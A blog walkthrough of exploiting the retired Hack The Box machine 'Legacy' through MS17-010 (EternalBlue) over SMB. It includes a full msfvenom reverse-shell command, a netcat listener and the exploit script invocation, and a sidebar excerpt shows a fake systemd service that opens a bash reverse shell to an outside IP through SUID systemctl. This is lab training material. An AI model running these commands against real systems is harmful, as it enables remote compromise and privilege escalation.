Skip to main content

Hackthebox.eu - Retired - Legacy - Updated

Hackthebox.eu - Retired - Legacy





Recon

I've been using Threader3000 for my recons can lately. I like the quick threaded up/down scan and the automated nmap scan.



I like to convert the xml output of nmap to HTML to make it easier for me to read 

xsltproc legacy.htb.xml -o ../legacy.htb.html




So it look like just two ports open

Port 139 SMB
Port 445 SMB



Just smb but we can also see from the nmap output that its likely as windows XP box


So it's just a windows xp box with smb exposed.


I tried to use smbclient to see what shares were being shared.


I kept getting a timeout so I assume no shares are open to anonymous access.


What to do now? Well how about we just google " Windows XP SMB Exploit"


Here is the first result

https://ivanitlearning.wordpress.com/2019/02/24/exploiting-ms17-010-without-metasploit-win-xp-sp3/


MS-17-010 is also known as eternal blue.


This is kind of an infamous vulnerability, not only because it was very effective, but because it appears it was actually found and weaponized by the NSA, who kept the exploit for themselves instead of letting microsoft know about it so they could patch it. Its existence came out after the Shadow Brokers stole some of the NSA tool kit in 2017. This is the exploit that was used by the wannacry ransomware to get control of systems to encrypt their hard drives and force payment for decryption.


Read up on it if you have a minute, it's a good story


https://en.wikipedia.org/wiki/EternalBlue



Ok so let's get back to the box…. 






Exploit


So thanks to the research done by Ivan on the blog we found before there is a way into this box without using metasploit. I personally don't have anything against using metasploit, it's a great tool and can help you get a job done fast. But I like to learn a little more about the exploits themselves so I like to look around for ways of doing something without using metasploit.



So Ivan found this python script which will leverage the exploit copy a file to the target computer and execute it. 


https://raw.githubusercontent.com/helviojunior/MS17-010/master/send_and_execute.py


I've made a copy of it on my kali box.


I'll follow Ivan's blog post from here on out.


First we need to make an executable to give to this python script that will get us a reverse shell.


Enter: msfvenom


Msfvenom is a payload generator for metasploit…. I know I just said I want to know more about what is going on so I try to avoid metasploit, and here I go using a metasploit tool, but this tool is kinda of "be all, end all" for reverse shell payload generation.


So we need to tell msfvenom we need a reverse shell to our ip address on the port we choose and what type of system to generate the payload for.


msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.6 LPORT=5555 EXITFUNC=thread -f exe -a x86 --platform windows -o EBlue.exe



So let's break down this command a bit  


-P windows/shell_reverse_tcp this is the payload type, in our case a windows reverse shell over tcp


LHOST 10.10.14.6 this is the ip address of where we want to establish a connection


LPORT 5555 this is the port number where we want to establish a connection


EXITFUNC  THREAD THREAD which basically says run this in a sub-thread and make a clean exit when done


-f exe what format we want the payload to be, we selected exe since its a windows computer


-a x86 the type of architecture to generate the payload for  (x86 or x64)


--platform windows the type of OS


-o EBlue.exe where we want the output of the generated payload to go



So now that we have our executable we will use the script mentioned on the site that will copy via smb to legacy and execute it for us.


https://github.com/helviojunior/MS17-010


First let's set up our listener in case we are successful.


nc -lnvp 5555



The python command would be 


python SendandExecute.py 10.10.10.4 ./EBlue.exe 


Which is the name of the python script to run with the IP of legacy and the name of the executable we want to send.



We get some python errors about importing a module named impacket.


Couple of things here. The script is written for original python so we will need to install impacket for python


python -m pip install impacket


We also need to make sure that we have the python script mysmb.py in the same folder we are executing from so you can get that script from this location.


https://raw.githubusercontent.com/worawit/MS17-010/master/mysmb.py


Now when we run our command again.


No errors and it looks like it worked, let's check our netcat listener.



We got a shell… whoami doesn't work. But we are in as system and can grab both flags for this box.



Labels:

Comments

Post a Comment

Popular posts from this blog

HacktheBox - Retired - Frolic

HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar
Post a Comment
Read more

RingZero CTF - Forensics - Who am I part 2

RingZero CTF - Forensics -  Who am I part 2 Objective: I'm the proud owner of this website. Can you verify that? Solution: Well it took me a bit to figure this one out. I tried looking at the whois records for ringzer0ctf.com I tired looking at the DNS records for the site. I even looked in the Certificate for the site. Then I thought a little be more about the question. It's not asking how I can verify who own the site. It wants me to verify the owner themselves. Luckily at the bottom the page we see who is listed as on the twittter feeds @ringzer0CTF and @ MrUnik0d3r lets check if we can find the PGP for MrUniK0d3r online. I googled PGP and MrUn1k0d3r The very first result is his PGP  keybase.txt with his PGP at the bottom of the file is the flag FLAG-7A7i0V2438xL95z2X2Z321p30D8T433Z
Post a Comment
Read more

Abusing systemctl SUID for reverse shell

Today I came across a box that had the SUID set for systemctl connected as the apache user www-data I was able to get a root reverse shell. This is to document how to use this for privilege escalation. I used a bit from this blog https://carvesystems.com/news/contest-exploiting-misconfigured-sudo/ and a bit from here too https://hosakacorp.net/p/systemd-user.html Step1. Create a fake service I named my LegitService.service I placed it in the /tmp directory on the server. [Unit] UNIT=LegitService Description=Black magic happening, avert your eyes [Service] RemainAfterExit=yes Type=simple ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.2.21.243/5555; cat <&5 | while read line; do $line 2>&5 >&5; done" [Install] WantedBy=default.target Then in order to add this to a place we can use systemctl to call from I created a link from /tmp, since I didn't have permission to put the file in the normal systemd folders systemctl link /tmp/LegitService.service The
Post a Comment
Read more